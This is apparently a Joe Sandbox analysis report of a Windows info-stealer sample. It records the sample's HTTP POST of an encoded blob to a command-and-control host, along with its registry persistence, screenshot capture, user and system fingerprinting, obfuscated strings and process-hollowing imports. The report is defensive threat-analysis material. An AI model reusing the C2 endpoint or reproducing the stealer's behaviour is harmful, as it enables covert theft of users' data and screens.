Jan 8, 2025 08:48:00.920124054 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:48:01.581615925 CET	821	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:48:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4myCkBM%2BDC3uW9mxcnZbsj3rzjWbr00olfqYjxTLnRAMgQeLLkUQPTtAR29EpBaeexueIKNkDDxVNBInaJzazhvk5ICj2QaToyiTfehRE62HwgZ7m%2F0nPAXkfjjHBWZBleuMmXi3RnT8z%2BpKin3CD2I2MBi21g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea95346bc90f36-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1479&min_rtt=1479&rtt_var=739&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Target ID:	0
Start time:	02:43:53
Start date:	08/01/2025
Path:	C:\Users\user\Desktop\6uHfmjGMfL.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\6uHfmjGMfL.exe"
Imagebase:	0xcb0000
File size:	444'928 bytes
MD5 hash:	89796A9B6072D2334DB09C8B41A64C57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	4.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	39.6%
Total number of Nodes:	1268
Total number of Limit Nodes:	9

Executed Functions

Function 00CB61F0 Relevance: 99.7, APIs: 40, Strings: 16, Instructions: 1737registrywindowfileCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,79C85444,79C85444), ref: 00CB639C
RegQueryValueExA.KERNEL32(79C85444,?,00000000,00000000,?,00000400,?,?,00000000,00000001,79C85444,79C85444), ref: 00CB63CA
RegCloseKey.KERNEL32(79C85444,?,?,00000000,00000001,79C85444,79C85444), ref: 00CB63D6
RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 00CB64E3
RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00CB6511
RegCloseKey.ADVAPI32(80000001), ref: 00CB651A
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 00CB663C
RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 00CB665F

Part of subcall function 00CB61F0: RegOpenKeyExA.KERNEL32(?,00000000), ref: 00CB67BD
Part of subcall function 00CB61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00CB6894
Part of subcall function 00CB61F0: RegEnumValueA.KERNEL32(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 00CB68E0

RegCloseKey.ADVAPI32(80000002), ref: 00CB6668
RegCloseKey.ADVAPI32(?), ref: 00CB6D5E
GdiplusStartup.GDIPLUS(?,?,00000000,79C85444,00000000), ref: 00CB6DEA
GetDC.USER32(00000000), ref: 00CB6F62
RegGetValueA.ADVAPI32(80000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CB71CD
GetSystemMetrics.USER32(00000000), ref: 00CB7226
GetSystemMetrics.USER32(00000000), ref: 00CB722F
RegGetValueA.ADVAPI32(80000002,?,00000000), ref: 00CB7277
GetSystemMetrics.USER32(00000001), ref: 00CB72CA
GetSystemMetrics.USER32(00000001), ref: 00CB72D3
CreateCompatibleDC.GDI32(?), ref: 00CB72DF
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00CB72F4
SelectObject.GDI32(00000000,00000000), ref: 00CB7304
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00CB732A
GdipCreateBitmapFromHBITMAP.GDIPLUS(00000000,00000000,?), ref: 00CB733E
GdipGetImageEncodersSize.GDIPLUS(00000000,?), ref: 00CB735A
GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 00CB7387
GdipSaveImageToFile.GDIPLUS(00000000,00000000,?,00000000), ref: 00CB740E
SelectObject.GDI32(00000000,?), ref: 00CB741B
DeleteObject.GDI32(00000000), ref: 00CB7428
DeleteObject.GDI32(?), ref: 00CB7430
ReleaseDC.USER32(00000000,?), ref: 00CB743A
GdipDisposeImage.GDIPLUS(00000000), ref: 00CB7441
GdiplusShutdown.GDIPLUS(?), ref: 00CB74E3
GetUserNameA.ADVAPI32(?,?), ref: 00CB75BA
LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00CB7600
GetSidIdentifierAuthority.ADVAPI32(?), ref: 00CB760D
GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CB7721
GetSidSubAuthority.ADVAPI32(?,00000000), ref: 00CB7748

Strings

NXVq6M==, xrefs: 00CB76A8
ntdll.dll, xrefs: 00CB815D
stoi argument out of range, xrefs: 00CB8048
PXPq6M==, xrefs: 00CB7751
ZrfiRSYDWA==, xrefs: 00CB6FA9
QIuuEzpUR20=, xrefs: 00CB6AB4
, xrefs: 00CB8140
YDUj4DJn, xrefs: 00CB761C
QIuuEzpURjO=, xrefs: 00CB6A53
image/jpeg, xrefs: 00CB73A2
1IuuEzp=, xrefs: 00CB6F81
QIuuEzpURTm=, xrefs: 00CB698C
QIuuEzpURjK=, xrefs: 00CB69EE
NtUnmapViewOfSection, xrefs: 00CB8158
(, xrefs: 00CB8206
invalid stoi argument, xrefs: 00CB8057

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: Value$Gdip$CloseImageMetricsObjectOpenSystem$AuthorityCreate$BitmapCompatibleDeleteEncodersGdiplusNameQuerySelect$AccountCountDisposeEnumFileFromIdentifierInfoLookupReleaseSaveShutdownSizeStartupUser
String ID: $($1IuuEzp=$NXVq6M==$NtUnmapViewOfSection$PXPq6M==$QIuuEzpUR20=$QIuuEzpURTm=$QIuuEzpURjK=$QIuuEzpURjO=$YDUj4DJn$ZrfiRSYDWA==$image/jpeg$invalid stoi argument$ntdll.dll$stoi argument out of range
API String ID: 1729688432-2329694862
Opcode ID: e1126614b3e19621e41824e6eeafc13909a1739ad841fba58b242ff538f193d1
Instruction ID: c7529d5ca63abb166aff36d220b26a2ad34af9d4116cbaad83c188720ec67f2c
Opcode Fuzzy Hash: e1126614b3e19621e41824e6eeafc13909a1739ad841fba58b242ff538f193d1
Instruction Fuzzy Hash: F3D20471A002189BDF18DF68CC85BEDBB75EF84300F508299F519E7292DB359A85CFA1

Function 00CBB700 Relevance: 32.7, APIs: 12, Strings: 6, Instructions: 1232COMMON

Download Yara Rule

APIs

Part of subcall function 00CBA270: GetTempPathA.KERNEL32(00000104,?,79C85444,?,00000000), ref: 00CBA2B7

GetFileAttributesA.KERNEL32(?,?,00000000,00000000), ref: 00CBB77B

Part of subcall function 00CB61F0: RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,79C85444,79C85444), ref: 00CB639C
Part of subcall function 00CB61F0: RegQueryValueExA.KERNEL32(79C85444,?,00000000,00000000,?,00000400,?,?,00000000,00000001,79C85444,79C85444), ref: 00CB63CA
Part of subcall function 00CB61F0: RegCloseKey.KERNEL32(79C85444,?,?,00000000,00000001,79C85444,79C85444), ref: 00CB63D6

GetFileAttributesA.KERNEL32(00000000,?,00000000,00000000), ref: 00CBB8B5
GetFileAttributesA.KERNEL32(00000000,?,00000000,00000000), ref: 00CBB9EF

Part of subcall function 00CB61F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 00CB64E3
Part of subcall function 00CB61F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00CB6511
Part of subcall function 00CB61F0: RegCloseKey.ADVAPI32(80000001), ref: 00CB651A

GetFileAttributesA.KERNEL32(00000000,?,00000000,00000000), ref: 00CBBB29
GetFileAttributesA.KERNEL32(00000000,?,00000000,00000000), ref: 00CBBC63

Part of subcall function 00CB61F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 00CB663C
Part of subcall function 00CB61F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 00CB665F
Part of subcall function 00CB61F0: RegCloseKey.ADVAPI32(80000002), ref: 00CB6668

GetFileAttributesA.KERNEL32(00000000,?,00000000,00000000), ref: 00CBBD9D
GetFileAttributesA.KERNEL32(00000000,?,00000000,00000000), ref: 00CBBED7

Part of subcall function 00CB61F0: RegOpenKeyExA.KERNEL32(?,00000000), ref: 00CB67BD

GetFileAttributesA.KERNEL32(00000000,?,00000000,00000000), ref: 00CBC011

Part of subcall function 00CB61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00CB6894
Part of subcall function 00CB61F0: RegEnumValueA.KERNEL32(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 00CB68E0

GetFileAttributesA.KERNEL32(00000000,?,00000000,00000000), ref: 00CBC14B
GetFileAttributesA.KERNEL32(00000000,?,00000000,00000000), ref: 00CBC285
GetFileAttributesA.KERNEL32(00000000,?,00000000,00000000), ref: 00CBC3BF

Part of subcall function 00CB61F0: RegCloseKey.ADVAPI32(?), ref: 00CB6D5E

GetFileAttributesA.KERNEL32(?,?,00000000,00000000), ref: 00CBC4FF

Part of subcall function 00CB93D0: GetVersionExW.KERNEL32(0000011C,79C85444,75920F00), ref: 00CB944A
Part of subcall function 00CB93D0: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CB94AB
Part of subcall function 00CB93D0: GetProcAddress.KERNEL32(00000000), ref: 00CB94B2

Part of subcall function 00CB93D0: GetNativeSystemInfo.KERNEL32(?), ref: 00CB9573

Part of subcall function 00CB93D0: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CB9577

Strings

U0TF, xrefs: 00CBBE94
Xr3w6CYo, xrefs: 00CBC242
U73r4YGp, xrefs: 00CBC4B6
U2Tn5it=, xrefs: 00CBB872
Y73u3CYt, xrefs: 00CBC37C
V0HDNw==, xrefs: 00CBBAE6

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: AttributesFile$CloseOpenValue$Info$QuerySystem$AddressEnumHandleModuleNativePathProcTempVersion
String ID: U0TF$U2Tn5it=$U73r4YGp$V0HDNw==$Xr3w6CYo$Y73u3CYt
API String ID: 3951112935-618692660
Opcode ID: b84da858c11ae2d0fb200222096ae366b937f75f5f6fc5f7c4b5690acd469b26
Instruction ID: 27e3b5c317dfbf69b5885e8ad88aa2d316310bfe45968d2ffe5bfe31f29550a2
Opcode Fuzzy Hash: b84da858c11ae2d0fb200222096ae366b937f75f5f6fc5f7c4b5690acd469b26
Instruction Fuzzy Hash: 80923871A001089BEF18DBB8CD89BEDBB72EF85314F64820CE054A73D6D7754E859B62

Function 00CBE8D0 Relevance: 25.3, APIs: 7, Strings: 7, Instructions: 764
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameA.ADVAPI32(?,?), ref: 00CBE91D
CoInitialize.OLE32(00000000), ref: 00CBEC54
CoCreateInstance.OLE32(00D0DFDC,00000000,00000001,00D0E03C,?), ref: 00CBEC73
CoUninitialize.OLE32 ref: 00CBEC81
CoUninitialize.OLE32 ref: 00CBF055
CoUninitialize.OLE32 ref: 00CBF06C
CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CBF455

Strings

PXULuc==, xrefs: 00CBFD73
YJ3RNw==, xrefs: 00CC0036, 00CC0698
eMLY5DB0Qy =, xrefs: 00CC0C03
PXUrDOPn, xrefs: 00CBFAFE
HVirDOPnQS2=, xrefs: 00CBFD9D
eMLY5zdpQw==, xrefs: 00CC0B62, 00CC0DC4
@3P, xrefs: 00CBF3EE

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: Uninitialize$CreateInitializeInstanceNameUser
String ID: @3P$HVirDOPnQS2=$PXULuc==$PXUrDOPn$YJ3RNw==$eMLY5DB0Qy =$eMLY5zdpQw==
API String ID: 1775936440-1920291987
Opcode ID: 9a84f8bc8e309de9ebaf006501f07cde9432af33c2a63abe02ed041fcbd91269
Instruction ID: 73a7c0e04927f10fe70d92d527c052e60af474fed87d89b63fe6bd736e068616
Opcode Fuzzy Hash: 9a84f8bc8e309de9ebaf006501f07cde9432af33c2a63abe02ed041fcbd91269
Instruction Fuzzy Hash: 60628971A002589BDF24DF68CC88BDDBBB5EF49308F5081D9E40DA7291DB35AA85CF61

Function 00CB93D0 Relevance: 18.0, APIs: 6, Strings: 4, Instructions: 473
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(0000011C,79C85444,75920F00), ref: 00CB944A
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CB94AB
GetProcAddress.KERNEL32(00000000), ref: 00CB94B2
GetNativeSystemInfo.KERNEL32(?), ref: 00CB9573
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CB9577

Strings

QouwFM==, xrefs: 00CB9882
QouvFc==, xrefs: 00CB992A
QouwEc==, xrefs: 00CB97DA
QouvGM==, xrefs: 00CB9732

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: InfoSystem$AddressHandleModuleNativeProcVersion
String ID: QouvFc==$QouvGM==$QouwEc==$QouwFM==
API String ID: 374719553-860442762
Opcode ID: 50617e8818ca99930a9edcd6b5e26a221899f35f2612fa63165fdad39da5e224
Instruction ID: d9c04a03570ee1d834946c6ad89d406dd071e291a27d73e049f0e137025c39c6
Opcode Fuzzy Hash: 50617e8818ca99930a9edcd6b5e26a221899f35f2612fa63165fdad39da5e224
Instruction Fuzzy Hash: 7A022370E00244ABDF24AB28DD4A3ED7BB1EB46310F50429DE915AB3C2DB344E859BD2

Function 00CEE7DE Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 330
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00CEE89B
_free.LIBCMT ref: 00CEEA67
_free.LIBCMT ref: 00CEEADF
GetTimeZoneInformation.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,00CEECA0,?,?,00000000), ref: 00CEEAF1

Strings

Eastern Standard Time, xrefs: 00CEEB8A
Eastern Summer Time, xrefs: 00CEEB9E

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: _free$InformationTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 597776487-239921721
Opcode ID: 98b09bab70477680498356dfbe101046b636ed769b751935f17893c04a2864f0
Instruction ID: 5d26733280cda2d6f0e9d2f72c30d489d4a714ce8375026a62f5db3f9cc2b242
Opcode Fuzzy Hash: 98b09bab70477680498356dfbe101046b636ed769b751935f17893c04a2864f0
Instruction Fuzzy Hash: 0AA14C71900255ABDB10FF67DC92AAEBBB9EF00390F14406AF915E7391EB309E41DB90

Function 00CB91B0 Relevance: 6.3, APIs: 4, Instructions: 324
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(0000011C,79C85444,75920F00), ref: 00CB944A
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CB94AB
GetProcAddress.KERNEL32(00000000), ref: 00CB94B2
GetNativeSystemInfo.KERNEL32(?), ref: 00CB9573

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: AddressHandleInfoModuleNativeProcSystemVersion
String ID:
API String ID: 2167034304-0
Opcode ID: af4fa4c25703d379b6fb6e999fb996f0f68a70eefb2b195732dcc2da25320f08
Instruction ID: be7b3804bf6bf5971ca49d179c8db1888c29b9b11adfc7751c8e29b0e493f2a2
Opcode Fuzzy Hash: af4fa4c25703d379b6fb6e999fb996f0f68a70eefb2b195732dcc2da25320f08
Instruction Fuzzy Hash: 91C1F471E002049BDF18DF68CC85BEDBBB5EF85310F508269E9159B3D2DB359A84CBA1

Function 00CCF300 Relevance: 40.1, APIs: 4, Strings: 18, Instructions: 1574registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB61F0: GetUserNameA.ADVAPI32(?,?), ref: 00CB75BA
Part of subcall function 00CB61F0: LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00CB7600
Part of subcall function 00CB61F0: GetSidIdentifierAuthority.ADVAPI32(?), ref: 00CB760D

RegOpenKeyExA.KERNEL32(80000002,System,00000000,000F003F,?,00000000), ref: 00CCF3E2
RegCloseKey.KERNEL32(80000002), ref: 00CCF3F8
GetUserNameA.ADVAPI32(?,80000002), ref: 00CCF482
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00CCF50D

Part of subcall function 00CB61F0: RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,79C85444,79C85444), ref: 00CB639C
Part of subcall function 00CB61F0: RegQueryValueExA.KERNEL32(79C85444,?,00000000,00000000,?,00000400,?,?,00000000,00000001,79C85444,79C85444), ref: 00CB63CA
Part of subcall function 00CB61F0: RegCloseKey.KERNEL32(79C85444,?,?,00000000,00000001,79C85444,79C85444), ref: 00CB63D6

Part of subcall function 00CB61F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 00CB64E3
Part of subcall function 00CB61F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00CB6511
Part of subcall function 00CB61F0: RegCloseKey.ADVAPI32(80000001), ref: 00CB651A

Part of subcall function 00CB61F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 00CB663C
Part of subcall function 00CB61F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 00CB665F
Part of subcall function 00CB61F0: RegCloseKey.ADVAPI32(80000002), ref: 00CB6668

Strings

c5a4ec, xrefs: 00CCF715
246122658369, xrefs: 00CCF34B, 00CCF777
hsG4, xrefs: 00CCF75D
2re4, xrefs: 00CCF6C9
System, xrefs: 00CCF3D8
3LU4, xrefs: 00CCF611
gLG4, xrefs: 00CCF66D
h1Y4, xrefs: 00CCF63F
f8G4, xrefs: 00CCF6F7
goU=, xrefs: 00CD062F, 00CD074D
fMS4, xrefs: 00CCF5B5
e1K4, xrefs: 00CCF785
g7K4, xrefs: 00CCF723
V, xrefs: 00CD0767
f774, xrefs: 00CCF57D
22C4, xrefs: 00CCF69B
RXYvEc==, xrefs: 00CCF740
22S4, xrefs: 00CCF5E3

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: CloseNameOpen$Value$User$AccountAuthorityFileIdentifierLookupModuleQuery
String ID: 22C4$22S4$246122658369$2re4$3LU4$RXYvEc==$System$V$c5a4ec$e1K4$f774$f8G4$fMS4$g7K4$gLG4$goU=$h1Y4$hsG4
API String ID: 4106312383-2964168004
Opcode ID: 91433a6af0b639f0d373056c6553d4ab1a265d426c4186c0637790f88c091275
Instruction ID: f6a26433e5fd7242631aed1442cae84811f2957d7affc152d41921894709e93c
Opcode Fuzzy Hash: 91433a6af0b639f0d373056c6553d4ab1a265d426c4186c0637790f88c091275
Instruction Fuzzy Hash: 94D20071A001589BEB29DB28CD89BDDBB769B81308F6081DDE108A73D6DB354FC58F52

Function 00CC05B0 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 312
networkfilesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000005DC,79C85444,?,00000000), ref: 00CC0642
InternetOpenW.WININET(00D0DB68,00000000,00000000,00000000,00000000), ref: 00CC0651
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00CC0675
HttpOpenRequestA.WININET(?,00000000), ref: 00CC06BF
HttpSendRequestA.WININET(?,00000000), ref: 00CC077F
InternetReadFile.WININET(?,?,000003FF,?), ref: 00CC0831
InternetReadFile.WININET(?,00000000,000003FF,?), ref: 00CC08E0
InternetCloseHandle.WININET(?), ref: 00CC0907
InternetCloseHandle.WININET(?), ref: 00CC090F
InternetCloseHandle.WININET(?), ref: 00CC0917

Strings

stoi argument out of range, xrefs: 00CC2C0A
YJ3RNw==, xrefs: 00CC0036, 00CC0698
eMLY5DB0Qy =, xrefs: 00CC0C03
invalid stoi argument, xrefs: 00CC2C14
eMLY5zdpQw==, xrefs: 00CC0B62, 00CC0DC4

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendSleep
String ID: YJ3RNw==$eMLY5DB0Qy =$eMLY5zdpQw==$invalid stoi argument$stoi argument out of range
API String ID: 1439999335-2043903211
Opcode ID: 155a9fdb255e1d11ed077181a0dcde1e95f554aafd5d14c623464688a1e35f22
Instruction ID: d652894ca4f582ad7a322a4c80b04f20ddd01b8876ff6fdfa653107b084d1cbf
Opcode Fuzzy Hash: 155a9fdb255e1d11ed077181a0dcde1e95f554aafd5d14c623464688a1e35f22
Instruction Fuzzy Hash: 8CB1B0B1A10218DBDB24DF28CC85B9EBB79EB81304F6081ADF50997291D7749AC4CFA5

Function 00CEEA7F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTimeZoneInformation.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,00CEECA0,?,?,00000000), ref: 00CEEAF1
_free.LIBCMT ref: 00CEEADF

Part of subcall function 00CE8006: HeapFree.KERNEL32(00000000,00000000,?,00CF0FAC,?,00000000,?,8B18EC83,?,00CF124F,?,00000007,?,?,00CF16F4,?), ref: 00CE801C
Part of subcall function 00CE8006: GetLastError.KERNEL32(?,?,00CF0FAC,?,00000000,?,8B18EC83,?,00CF124F,?,00000007,?,?,00CF16F4,?,?), ref: 00CE802E

_free.LIBCMT ref: 00CEECA9

Strings

Eastern Standard Time, xrefs: 00CEEB8A
Eastern Summer Time, xrefs: 00CEEB9E

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
